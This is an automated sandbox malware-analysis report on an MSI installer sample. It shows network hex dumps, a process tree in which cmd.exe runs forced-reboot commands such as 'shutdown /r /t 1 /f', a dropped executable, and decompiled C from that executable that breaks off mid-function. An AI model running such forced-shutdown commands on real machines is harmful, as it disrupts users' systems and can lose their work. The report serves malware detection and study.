3a a0 aa 95 2d 0d Data Ascii: 729b<}e;C{Jb[:399MKWT\\C>J=H"\|0pBG)z_6=}wqMQa.]\%9Q\|GfiF/\GK eRrQ2%b)8<dN4`#WoS!O:-
2023-01-05 12:18:10 UTC	1805	IN	Data Raw: e4 c8 c3 9a c5 32 ed 91 ee 45 ed 46 0f ea be 8a cf 25 04 44 86 7d 3e c5 e8 45 36 d2 bf b1 18 3d d3 55 e5 8d 36 2b 76 bd 25 e9 7d b0 57 7f b2 3e ed d1 5e 0b 2c 4c 38 d3 17 06 80 71 34 fa dd 52 9f d4 a1 7f 3d b2 86 1e f3 f7 a7 74 ab 09 6f e5 40 d8 7b ce 40 b3 88 02 e3 1b 7a a8 f3 f8 2b 0d 28 58 cf fc d3 25 69 d1 88 01 a6 03 d1 db 50 46 95 29 c3 83 c1 f1 05 d2 d3 d4 35 d7 dd 41 45 48 66 d8 c9 f3 ce 43 df 32 76 ef 81 a9 73 d9 54 37 44 cb 7b 72 8d 73 c0 72 b0 be 5c 38 1c 2f 88 c2 36 43 61 2d c6 a4 9e e8 92 76 3e a4 3d 65 63 02 7b ad 1c a7 6f 5a 96 86 56 b4 a6 14 ff 3d d2 07 09 50 c6 fb 96 0d e5 e4 91 6e e3 83 d0 ad a7 80 a4 cd 67 77 e0 a1 84 79 f9 84 fd ce 31 25 21 a8 ae 0b e8 ef 11 07 25 bc e0 c4 88 b1 04 07 cd 55 e6 95 bf 3b f3 8d 2a a6 af 16 78 7e 47 24 fa Data Ascii: 2EF%D}>E6=U6+v%}W>^,L8q4R=to@{@z+(X%iPF)5AEHfC2vsT7D{rsr\8/6Ca-v>=ec{oZV=Pngwy1%!%U;*x~G$
2023-01-05 12:18:10 UTC	1806	IN	Data Raw: ad 66 cf 5c b4 43 1d c9 99 12 59 81 fd 34 51 37 2f e2 82 af 7e 43 da 33 91 3e ce fa 9f f2 cf 8c 59 35 ee f6 65 74 1f 68 32 ba f0 c0 b0 be 6e 40 61 7a 46 c7 51 01 dc ee b5 43 f7 3e 8c 2d 5e f3 51 90 d2 d1 b7 fb 46 57 7c c1 33 ae 54 b7 6b 27 35 30 ff 73 16 96 34 28 ac ab 1b be 42 af 65 e4 b4 de 18 f5 5b 84 9c 1b 1f 57 db 7d b1 12 e0 d7 c1 3f 36 49 49 0b 92 c1 d3 ac a8 05 96 c2 8e f3 35 75 ca df b9 e0 42 28 d9 05 dd 41 0d 8e 92 12 cd 70 a6 f9 bb c0 4c 1e 49 2a f6 ec 03 0f 9a c7 13 6d c1 03 1a a6 83 48 7f 06 08 ac 70 ee 29 e9 3f 5b d0 c0 48 af 32 b4 22 a7 4d 59 98 16 7c bd c6 c7 fe 9d c9 99 8b 4e cd 32 14 45 fc 52 88 39 4c 9c 60 f7 5a fb 12 21 63 07 d1 d5 94 9a 39 64 1c 0a d9 6a d9 b8 d0 25 ec 47 bb 71 e6 1a c4 bb 5f b1 1b 98 46 83 60 83 20 ff 40 b0 93 91 f8 Data Ascii: f\CY4Q7/~C3>Y5eth2n@azFQC>-^QFW\|3Tk'50s4(Be[W}?6II5uB(ApLI*mHp)?[H2"MY\|N2ER9L`Z!c9dj%Gq_F` @
2023-01-05 12:18:10 UTC	1822	IN	Data Raw: 03 c6 c0 91 1e b9 c4 47 90 8f d5 76 aa 7a 3d 18 b4 5f b0 96 1d a2 82 0f b9 c1 6d 4c 4d 97 23 2d 40 5a cf 38 f9 ac bd 35 77 b8 92 71 04 64 1f b4 88 2b 02 ce 53 af 65 53 53 f8 8c 7a de 44 76 65 47 f8 7c 84 eb 95 01 aa 97 c4 9c 5b f8 63 cd 5b 33 35 b8 b7 91 26 e7 2e f3 89 ac e1 ad 1b e5 00 ed fe 90 49 78 a5 ca e6 cd af ad b8 c2 3a 2c 0f 9d e9 56 6e e8 05 42 12 68 81 10 bf a5 40 0d f0 53 7d ee a1 db 48 90 5f 2b 4b 73 fd 7c 4a fe eb bd e3 d4 c3 ac a6 7e d1 c2 62 5c 1f 5a 8a 01 43 d0 c2 6f af 44 46 90 c0 8c 7a a3 07 19 3f e7 81 bc 81 15 6e bc ae df ae 98 a1 17 f1 4e 3b 95 a1 3c 2c c3 4a 4a 4e 60 5f ee 69 06 b2 de d1 f4 a7 69 0d cf 8c 53 49 0d be 75 99 cd 65 65 a7 ad de 9c 78 4b b6 e2 21 0b 71 47 ce bb 33 b5 12 92 d2 00 7e ad e9 08 b7 5a c5 3b 3a f3 6f 67 2b cb Data Ascii: Gvz=_mLM#-@Z85wqd+SeSSzDveG\|[c[35&.Ix:,VnBh@S}H_+Ks\|J~b\ZCoDFz?nN;<,JJN`_iiSIueexK!qG3~Z;:og+
2023-01-05 12:18:10 UTC	1823	IN	Data Raw: 29 5b f3 99 1d 1e 67 3e c1 0f f6 a4 4f 6e 83 a5 7e f6 ce 8b fd 65 52 0b 85 a2 a6 e6 37 4d 8f 5b 40 7d 53 2e ca 37 16 29 8f f1 cf f9 ca 97 34 4c 2f d8 91 07 55 b3 ee 17 1a 4a bd aa 61 13 97 08 85 01 0b 49 d9 1b b5 d6 9b 3c 23 68 17 5e e9 1a 61 cf 8a 12 f6 0d 24 76 0d 1f 4f eb 42 b2 34 52 13 76 ec 07 14 f8 4e 54 43 0f e6 72 d0 f2 dd 12 4b 14 69 7c cf 2d c3 3b ca 7f d8 f1 bf 4d c8 ea 0a cc 53 c9 25 3c 34 c7 3e e8 34 a6 fe d9 3c e6 8e a5 dd 1e 1f e0 e4 be 8b f1 49 27 73 f9 ab bf 0a a1 86 39 a5 e5 b7 4f 09 82 f8 95 88 dc ae 2f fd 26 c2 a2 c4 94 31 f6 85 46 14 fe 21 55 65 cf f0 71 01 5b 9e 13 15 7c c6 84 ef 8a 41 38 09 12 9f 4a 04 6e b1 73 7c 08 e6 7a f1 82 5e 83 3f ef 9d 95 64 95 f2 15 e4 e2 92 cb a0 c7 9b 3c 36 59 96 e1 da 05 31 74 07 73 e9 95 eb 37 78 fe df Data Ascii: )[g>On~eR7M[@}S.7)4L/UJaI<#h^a$vOB4RvNTCrKi\|-;MS%<4>4<I's9O/&1F!Ueq[\|A8Jns\|z^?d<6Y1ts7x
2023-01-05 12:18:10 UTC	1839	IN	Data Raw: 68 51 e6 a7 e5 4b 03 86 ae e6 b5 04 6e e3 35 af e9 89 e9 35 12 d5 3e 33 6f dc 3c ef 36 fb 75 5a 96 0c 3b c5 cb 77 04 09 e9 fd 44 71 5a 38 d2 47 7c e6 65 1f 5e f6 ec 32 45 e2 3a 72 93 df 0b 52 91 07 00 cd 75 4b a0 5b 42 36 41 8e 74 d1 54 4f f6 fe 8a 2d e0 36 c6 d2 6d f1 dc 46 8e ba c9 bb cf 48 fa b1 97 27 9a 70 aa cf 49 d7 96 ff 34 fe fb 09 8a ff 46 d4 26 9e 61 0d 53 c8 42 0c c1 60 63 20 c0 7d bc e5 2c 99 90 02 e4 db 1a 53 d8 87 08 ed d4 34 ec 2f d0 63 29 81 57 31 26 8e 89 21 29 aa bb 4e 57 b8 b3 53 be 35 08 df a2 45 0e ed 92 42 a0 04 05 42 21 10 dd 24 51 57 9b 12 a3 33 40 9d 0b 92 a2 03 12 fa 59 b4 28 85 03 9d 82 28 1c 60 82 ba 90 89 09 b1 27 3f 57 32 46 d2 d5 07 d1 20 01 f9 bd 08 a9 f9 12 c0 35 0b 29 2e 43 1c 72 04 3f eb 9a 52 a6 20 7f ef 51 da 94 c1 a4 Data Ascii: hQKn55>3o<6uZ;wDqZ8G\|e^2E:rRuK[B6AtTO-6mFH'pI4F&aSB`c },S4/c)W1&!)NWS5EBB!$QW3@Y((`'?W2F 5).Cr?R Q
2023-01-05 12:18:10 UTC	1840	IN	Data Raw: 34 77 20 4d b6 a8 bb ef 73 13 da 48 b9 8c 80 46 5a f0 51 86 a4 af ce 31 7d 45 42 b5 32 8a 54 19 60 e3 2a 05 4d 71 2e 69 83 c8 71 d1 80 42 b7 1b 77 9a b2 ff db 0c df 05 cc fe 14 04 bf a0 21 9b ec d0 20 e8 ca 08 cd 1d c2 d9 c8 98 c6 53 5a 27 6f 44 08 ec 40 c4 22 cb d8 29 19 65 2f ad db 98 80 68 92 a0 28 23 85 cc e6 1c 2b 5b 46 f3 ae 89 aa 7a 8e 92 88 7d 88 37 67 c4 92 59 dc 72 dd 1b 7b 0e e7 a7 c0 45 70 60 b3 7b 64 17 af 59 8f aa a0 28 79 2a 78 e7 cc 9d 7d d8 25 35 70 e1 3c 4d 5b ea 38 d8 fb dc 88 01 99 3a 17 f3 33 03 0d d9 4d c1 53 85 95 22 4b b1 91 93 19 bf cf 9c 2a 53 0a 9a 64 3d 38 27 70 f0 62 47 67 44 a5 19 74 02 73 60 b9 29 82 a5 3d f2 e1 75 ac 86 ae f1 d2 e9 19 ed ee 87 48 b7 58 a4 36 20 4e 46 b9 01 a4 94 34 d5 e5 55 e4 ad da 28 b8 67 a0 66 c7 00 0e Data Ascii: 4w MsHFZQ1}EB2T`Mq.iqBw! SZ'oD@")e/h(#+[Fz}7gYr{Ep`{dY(yx}%5p<M[8:3MS"K*Sd=8'pbGgDts`)=uHX6 NF4U(gf
2023-01-05 12:18:10 UTC	1856	IN	Data Raw: eb 36 7d 49 d7 b7 1e 71 ed 6c eb 32 13 e5 f1 f3 1f e8 c7 ca f8 dc 3e de 92 83 92 e1 bd c1 ff 7a 32 fe 40 f6 a8 de 61 e5 97 fd a3 07 db 96 67 3c ab 7e dd fc 96 dc 5f 99 b6 96 67 9b cf cf 1e a8 0b bf a2 d6 1c 0b 37 e7 e6 87 dc c3 5f 95 49 ae fc 3d 1b c6 f7 03 65 39 19 2c 1f cb 60 69 3e 78 5f ef fb 7d bd 6f 5e f9 d5 c5 08 fa a1 8c a0 ff 58 8f 9d 1f f2 a7 ba a6 f2 dc 1f e2 34 28 63 77 f3 87 cb 6a 4c 48 d0 b3 cc 6c 55 9e a6 e5 19 17 42 3d 7c 5f 3d 94 77 ff e7 62 a7 d4 d6 26 5b 35 ea de 67 d4 31 37 ff 13 d9 fc 5f 94 63 b7 7d f3 7f 5d c2 17 5d b7 e2 dd de fc a7 44 1f ef e3 82 8a 4b 22 6f fc a7 b2 f9 23 b5 dc ad b3 94 aa 8f 2f 3f b0 aa 4f a9 f1 78 ff 7f 54 ee c0 2a 1e f7 d8 7e f3 27 5c 81 3f 55 0f 64 81 94 61 a9 fe fc 33 56 59 b5 c3 fb 2c c7 2c f2 ac cb b2 28 2e Data Ascii: 6}Iql2>z2@ag<~_g7_I=e9,`i>x_}o^X4(cwjLHlUB=\|_=wb&[5g17_c}]]DK"o#/?OxT*~'\?Uda3VY,,(.
2023-01-05 12:18:10 UTC	1857	IN	Data Raw: f5 dc 9a 05 57 4c ff b1 f5 44 7d c3 eb bb 50 d7 cf 62 7d fd 23 72 73 9e 30 e9 ff 81 6c 7e 53 dd aa b7 1e f0 a9 ad 07 78 79 5b 36 e3 ee a9 a5 cf b6 b4 ae 7f 6c f7 6f 4c b4 26 30 85 c4 2d 16 cb f7 ef 2f a9 d8 4e 1e 6d c8 9e fe 4a 06 e7 92 6c 56 64 b3 2a 1b e2 8e 4d 19 b0 db b2 71 ca e6 d7 94 25 57 26 44 a2 99 a5 07 1b 9b 2f b6 de b0 3c 7e 6a 53 5f 41 2c a3 7e 5e 85 71 b6 37 2c 0f c4 c0 bc 78 5f 02 ac 17 ef 49 a8 b5 fc 54 ed c7 26 e1 9f cd b6 f1 94 27 36 5f 3c 95 01 f8 54 3d f8 2e ff 9e 3e 95 69 30 b3 cf 64 c6 3f d5 f7 f9 e6 ff 2d 36 4e 76 6a ee fb 5b 98 19 d0 21 fb 6c e9 e7 ac db fa a8 1e 49 30 2d 0f b4 41 78 6a 2f 4b dc fb fe d2 37 ef bd f3 b1 65 c9 ba fc e0 c1 d2 8a 98 d6 df 7d b2 fd d0 5e be fb 9d 66 f8 fc b7 72 ce 6f 9b 2f 79 a6 8d cc 5b e6 cf 77 65 9d Data Ascii: WLD}Pb}#rs0l~Sxy[6loL&0-/NmJlVd*Mq%W&D/<~jS_A,~^q7,x_IT&'6_<T=.>i0d?-6Nvj[!lI0-Axj/K7e}^fro/y[we

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: msiexec.exePID: 5896, Parent PID: 3452

General

Target ID:	0
Start time:	13:17:59
Start date:	05/01/2023
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\AOEI-LEHOLLZCZW.msi"
Imagebase:	0x7ff67cba0000
File size:	66048 bytes
MD5 hash:	4767B71A318E201188A0D0A420C8B608
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: msiexec.exePID: 6092, Parent PID: 580

General

Target ID:	1
Start time:	13:18:00
Start date:	05/01/2023
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff67cba0000
File size:	66048 bytes
MD5 hash:	4767B71A318E201188A0D0A420C8B608
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: msiexec.exePID: 736, Parent PID: 6092

General

Target ID:	2
Start time:	13:18:01
Start date:	05/01/2023
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding 1731ACBB29F16859495353965C830558
Imagebase:	0x1380000
File size:	59904 bytes
MD5 hash:	12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5152, Parent PID: 736

General

Target ID:	3
Start time:	13:18:15
Start date:	05/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /C shutdown -r -f -t 60
Imagebase:	0xb0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5212, Parent PID: 5152

General

Target ID:	4
Start time:	13:18:17
Start date:	05/01/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5164, Parent PID: 736

General

Target ID:	5
Start time:	13:18:17
Start date:	05/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c shutdown /r /t 1 /f
Imagebase:	0xb0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 2820, Parent PID: 5164

General

Target ID:	6
Start time:	13:18:17
Start date:	05/01/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: shutdown.exePID: 4528, Parent PID: 5152

General

Target ID:	7
Start time:	13:18:17
Start date:	05/01/2023
Path:	C:\Windows\SysWOW64\shutdown.exe
Wow64 process (32bit):	true
Commandline:	shutdown -r -f -t 60
Imagebase:	0x1200000
File size:	23552 bytes
MD5 hash:	E2EB9CC0FE26E28406FB6F82F8E81B26
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: shutdown.exePID: 3108, Parent PID: 5164

General

Target ID:	8
Start time:	13:18:18
Start date:	05/01/2023
Path:	C:\Windows\SysWOW64\shutdown.exe
Wow64 process (32bit):	true
Commandline:	shutdown /r /t 1 /f
Imagebase:	0x1200000
File size:	23552 bytes
MD5 hash:	E2EB9CC0FE26E28406FB6F82F8E81B26
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: LtfQdc.exePID: 5540, Parent PID: 3452

General

Target ID:	18
Start time:	13:18:25
Start date:	05/01/2023
Path:	C:\Users\user\LtfQdc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\LtfQdc.exe"
Imagebase:	0xc80000
File size:	837032 bytes
MD5 hash:	E90BBFCDFDA75CB22FEDF1B94F8F20F6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: LtfQdc.exePID: 5540, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.5%
Total number of Nodes:	241
Total number of Limit Nodes:	26

Executed Functions

Function 00CD3550 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 581
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 54%

			E00CD3550(void* __ebx, void* __edi, void* __fp0, intOrPtr _a4, unsigned int _a8, intOrPtr _a12, signed int _a16) {
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _t214;
				signed int _t217;
				char _t223;
				intOrPtr _t225;
				void* _t226;
				signed char _t227;
				signed int _t241;
				signed int _t242;
				intOrPtr* _t243;
				signed int _t250;
				void* _t256;
				signed char _t257;
				intOrPtr* _t276;
				intOrPtr _t283;
				intOrPtr* _t302;
				intOrPtr _t308;
				signed int _t324;
				signed int _t326;
				intOrPtr _t330;
				void* _t335;
				intOrPtr* _t336;
				signed int* _t338;
				unsigned int _t339;
				signed int _t340;
				intOrPtr* _t342;
				signed int _t344;
				intOrPtr _t345;
				signed int _t349;
				signed int _t351;
				intOrPtr* _t352;
				intOrPtr _t353;
				void* _t355;
				signed char _t359;
				signed int* _t367;
				void* _t372;
				signed char _t376;
				intOrPtr* _t385;
				intOrPtr _t393;
				intOrPtr _t394;
				unsigned int _t396;
				intOrPtr _t404;
				intOrPtr _t405;
				signed int _t406;
				unsigned int _t407;
				signed int _t409;
				signed int _t422;
				intOrPtr* _t423;
				signed int _t427;
				signed int _t432;
				signed int _t439;
				signed int _t447;
				signed int _t449;
				unsigned int _t453;
				char* _t455;
				signed int _t456;
				signed int _t460;
				signed int _t463;
				intOrPtr _t465;
				void* _t468;
				void* _t469;

				_t493 = __fp0;
				_push(__ebx);
				_push(__edi);
				_t469 = _t468 - 0xc;
				_t330 = _a12;
				_t453 = _a8;
				if(_t330 == 0) {
					_t415 = 0;
					if(_t453 == 0) {
						goto L43;
					} else {
						asm("prefetcht0 [esi]");
						_t214 = _t453 & 0xffe00000;
						_t447 =  *(_t214 + 0x1000);
						_t349 = _t453 >> 0x00000009 & 0x00000fe0;
						_t217 = ( *(_t214 + _t349 + 0x101e) & 0x3f) << 5;
						_t351 = _t453 -  *((intOrPtr*)(_t447 + 0x10));
						_t334 = _t214 + _t349 + 0x1000 - _t217;
						_v20 = _t214 + _t349 + 0x1000 - _t217;
						asm("prefetcht0 [ebx]");
						_v24 = _t351;
						if( *_t447 == 2) {
							if(( *0xd43d89 & 1) != 0) {
								L00CD7BD0(_t334, __fp0);
								_t351 = _v24;
								_t415 = 0;
							}
							_t217 = _t351 >> 0x15;
							if( *((short*)(_t217 + _t217 + 0xd42d24)) != 0xfffe) {
								goto L26;
							} else {
								_t396 = _t453;
								_t439 = _v20;
								_t308 =  *((intOrPtr*)(_t439 + 8));
								if(( *(_t439 + 0xf) & 0x00000008) != 0) {
									_v20 = _v20 + 0x20;
								} else {
									_v20 = _t308 + 0xc;
								}
								_t465 =  *((intOrPtr*)(_t308 + 0xc));
								if( *0xd43d8b == 1) {
									E00D011A0(_t396, _t396, 0,  *_v20 -  *((intOrPtr*)(_t447 + 0xc)));
									_t469 = _t469 + 0xc;
								}
								asm("lock and [edx+ecx+0x4000], eax");
								asm("lock xadd [0xd43d6c], eax");
								_t404 =  *0xd43d70; // 0x100000
								if(_t465 + _t465 > _t404) {
									_t405 =  *0xd43d84; // 0xd43d78
									if(E00CEB6F0(_t405) != 0 && ( *0xd43d88 & 0x000000ff) == 0) {
										L00CD7B60(_t493, 1);
										_t469 = _t469 + 4;
									}
								}
								goto L42;
							}
						} else {
							L26:
							if( *((char*)(_t447 + 6)) == 0) {
								L35:
								if( *((char*)(_t447 + 3)) == 0) {
									L78:
									_t455 = _v24;
									 *_t455 = 0;
									_t335 = _t447 + 0x40;
									__imp__TryAcquireSRWLockExclusive(_t335);
									if(_t217 == 0) {
										L00CC8B90(_t217, _t335);
									}
									_t352 = _v20;
									 *((intOrPtr*)(_t447 + 0x117c)) =  *((intOrPtr*)(_t447 + 0x117c)) -  *((intOrPtr*)( *((intOrPtr*)(_t352 + 8)) + 0xc));
									_t223 =  *_t352;
									if(_t223 == _t455) {
										goto L107;
									} else {
										asm("bswap eax");
										 *_t455 = _t223;
										 *_t352 = _t455;
										_t227 =  *(_t352 + 0xc);
										_t415 = _t227 & 0xefffffff;
										 *(_t352 + 0xc) = _t227 & 0xefffffff;
										if((_t227 & 0x00003ffe) == 0) {
											goto L108;
										} else {
											_t460 = _t227 + 0x00003ffe & 0x00003ffe;
											 *(_t352 + 0xc) = _t227 & 0xefffc001 | _t460;
											if((_t227 & 0x00000001) != 0 || _t460 == 0) {
												L00C92150(_t352, _t493, 1);
											}
											__imp__ReleaseSRWLockExclusive(_t335);
											goto L42;
										}
									}
								} else {
									_t217 =  *(_v20 + 8);
									_t355 = _t447 + 0x48;
									if(_t355 > _t217) {
										goto L78;
									} else {
										_t415 = _t447 + 0x1148;
										if(_t447 + 0x1148 < _t217) {
											goto L78;
										} else {
											_t422 =  *0xd43e38; // 0x0
											_t415 =  *( *[fs:0x2c] + _t422 * 4);
											_t336 =  *((intOrPtr*)( *( *[fs:0x2c] + _t422 * 4) + 0xa0));
											if(_t336 < 2) {
												goto L78;
											} else {
												_t217 = _t217 - _t355 >> 5;
												 *((intOrPtr*)(_t336 + 0x30)) =  *((intOrPtr*)(_t336 + 0x30)) + 1;
												asm("adc dword [ebx+0x34], 0x0");
												if(_t217 > ( *0xd42d20 & 0x0000ffff)) {
													 *((intOrPtr*)(_t336 + 0x40)) =  *((intOrPtr*)(_t336 + 0x40)) + 1;
													asm("adc dword [ebx+0x44], 0x0");
													goto L78;
												} else {
													asm("bswap ecx");
													_t423 = _v24;
													 *_t423 =  *((intOrPtr*)(_t336 + 0x58 + _t217 * 8));
													 *((intOrPtr*)(_t336 + 0x58 + _t217 * 8)) = _t423;
													 *((char*)(_t336 + 0x5c + _t217 * 8)) =  *((char*)(_t336 + 0x5c + _t217 * 8)) + 1;
													 *_t336 =  *_t336 + ( *(_t336 + 0x5e + _t217 * 8) & 0x0000ffff);
													 *((intOrPtr*)(_t336 + 0x38)) =  *((intOrPtr*)(_t336 + 0x38)) + 1;
													asm("adc dword [ebx+0x3c], 0x0");
													_t359 =  *(_t336 + 0x5d + _t217 * 8) & 0x000000ff;
													if( *((intOrPtr*)(_t336 + 0x5c + _t217 * 8)) > _t359) {
														_push((_t359 & 0x000000ff) >> 1);
														_push(_t336 + _t217 * 8 + 0x58);
														E00CC87A0(_t336, _t336, _t447);
													}
													if(( *(_t336 + 4) & 1) != 0) {
														L00CC7E00(_t336);
													}
													goto L42;
												}
											}
										}
									}
								}
							} else {
								if((_t351 & 0x00000fff) == 0) {
									_t338 = (_v24 >> 0x00000009 & 0x00000ff8) + (_t351 & 0xffe00000) + 0x2000;
								} else {
									_t338 = _t351 - 4;
								}
								if(( *_t338 & 0x7fffffff) != 1 &&  *((char*)(_t447 + 7)) != 0) {
									if(( *(_v20 + 0xf) & 0x00000008) != 0) {
										_t302 = _v20 + 0x20;
									} else {
										_t302 =  *(_v20 + 8) + 0xc;
									}
									E00D011A0(_t447, _t453, 0xef,  *_t302 -  *((intOrPtr*)(_t447 + 0xc)));
									_t469 = _t469 + 0xc;
									_t415 = 0;
								}
								_t241 =  *_t338;
								do {
									asm("lock cmpxchg [ebx], ecx");
								} while ((_t241 & 0xfffffffe) != 0);
								if((_t241 & 0x00000001) == 0) {
									goto L45;
								} else {
									_t217 = _t241 & 0x7fffffff;
									if(_t217 != 1) {
										asm("lock add [edi+0x1198], eax");
										asm("lock inc dword [edi+0x119c]");
										asm("lock add [edi+0x11a0], eax");
										asm("lock inc dword [edi+0x11a4]");
										goto L43;
									} else {
										goto L35;
									}
								}
							}
						}
					}
				} else {
					_t406 = _a16;
					if(_t330 + (( *0xd53ec0 & 0x000000ff) << 3) < 0) {
						asm("int3");
						_t338 = 0;
					}
					_t324 = E00CD29D0(_t406, _t338);
					if(_t324 == 0) {
						L42:
						_t415 = 0;
						goto L43;
					} else {
						_t415 = _t324;
						if(_t453 == 0) {
							L43:
							return _t415;
						} else {
							_t326 = _t453 & 0xffe00000;
							_t407 = _t453;
							_t453 = _t326 + 0x1000;
							_t409 = _t407 >> 0x00000009 & 0x00000fe0;
							_t447 = _t326 + _t409 + 0x1000;
							_t242 = _t447 - (( *(_t326 + _t409 + 0x101e) & 0x3f) << 5);
							_t367 =  *(_t242 & 0xffe01000);
							if(( *(_t242 + 0xf) & 0x00000008) != 0) {
								L46:
								_t243 = _t242 + 0x20;
							} else {
								_t243 =  *((intOrPtr*)(_t242 + 8)) + 0xc;
							}
							_t246 =  >=  ? _t338 :  *_t243 - _t367[3];
							_t339 = _a8;
							_v20 = _t415;
							L00D00C20(_t415, _t339,  >=  ? _t338 :  *_t243 - _t367[3]);
							_t469 = _t469 + 0xc;
							asm("prefetcht0 [ebx]");
							_t455 =  *_t453;
							_t250 = ( *(_t447 + 0x1e) & 0x3f) << 5;
							_t427 = _t339 -  *((intOrPtr*)(_t455 + 0x10));
							_t447 = _t447 - _t250;
							asm("prefetcht0 [edi]");
							if( *_t455 == 2) {
								if(( *0xd43d89 & 1) != 0) {
									_t340 = _t447;
									L00CD7BD0(_t340, _t493);
									_t415 = _t427;
									_t447 = _t340;
								}
								_t250 = _t415 >> 0x15;
								if( *((short*)(_t250 + _t250 + 0xd42d24)) != 0xfffe) {
									goto L7;
								} else {
									_t344 = _t447;
									_t449 = _t415;
									_t283 =  *((intOrPtr*)(_t344 + 8));
									if(( *(_t344 + 0xf) & 0x00000008) != 0) {
										_t385 = _t344 + 0x20;
									} else {
										_t385 = _t283 + 0xc;
									}
									_t345 =  *((intOrPtr*)(_t283 + 0xc));
									if( *0xd43d8b == 1) {
										E00D011A0(_t449, _a8, 0,  *_t385 -  *((intOrPtr*)(_t455 + 0xc)));
										_t469 = _t469 + 0xc;
									}
									asm("lock and [edx+ecx+0x4000], eax");
									asm("lock xadd [0xd43d6c], eax");
									_t393 =  *0xd43d70; // 0x100000
									if(_t345 + _t345 > _t393) {
										_t394 =  *0xd43d84; // 0xd43d78
										if(E00CEB6F0(_t394) != 0 && ( *0xd43d88 & 0x000000ff) == 0) {
											L00CD7B60(_t493, 1);
											_t469 = _t469 + 4;
										}
									}
									goto L23;
								}
							} else {
								L7:
								if( *((char*)(_t455 + 6)) == 0) {
									L16:
									_v24 = _t447;
									_t447 = _t415;
									if( *((char*)(_t455 + 3)) == 0) {
										L58:
										 *_t447 = 0;
										_t335 = _t455 + 0x40;
										__imp__TryAcquireSRWLockExclusive(_t335);
										if(_t250 == 0) {
											L00CC8B90(_t250, _t335);
										}
										_t415 = _v24;
										 *((intOrPtr*)(_t455 + 0x117c)) =  *((intOrPtr*)(_t455 + 0x117c)) -  *((intOrPtr*)( *((intOrPtr*)(_t415 + 8)) + 0xc));
										_t256 =  *_t415;
										if(_t256 == _t447) {
											asm("int3");
											asm("ud2");
											goto L106;
										} else {
											asm("bswap eax");
											 *_t447 = _t256;
											 *_t415 = _t447;
											_t257 =  *(_t415 + 0xc);
											 *(_t415 + 0xc) = _t257 & 0xefffffff;
											if((_t257 & 0x00003ffe) == 0) {
												L106:
												asm("int3");
												asm("ud2");
												L107:
												asm("int3");
												asm("ud2");
												L108:
												asm("int3");
												asm("ud2");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												_push(_t455);
												_t456 = _v20;
												_t353 =  *0xd515c0; // 0xd51600
												if(_t353 == 0) {
													_t353 = E00CD4240(_t335, _t415, _t447);
												}
												_t225 = _a4;
												_t457 = _t456 + (( *0xd53ec0 & 0x000000ff) << 3);
												if(_t456 + (( *0xd53ec0 & 0x000000ff) << 3) < 0) {
													asm("int3");
													_t457 = 0;
												}
												_t226 = L00CD9AB0(_t353, 0x10, _t225, _t457, 0xd2fc87); // executed
												return _t226;
											} else {
												_t370 = _t415;
												_t463 = _t257 + 0x00003ffe & 0x00003ffe;
												 *(_t415 + 0xc) = _t257 & 0xefffc001 | _t463;
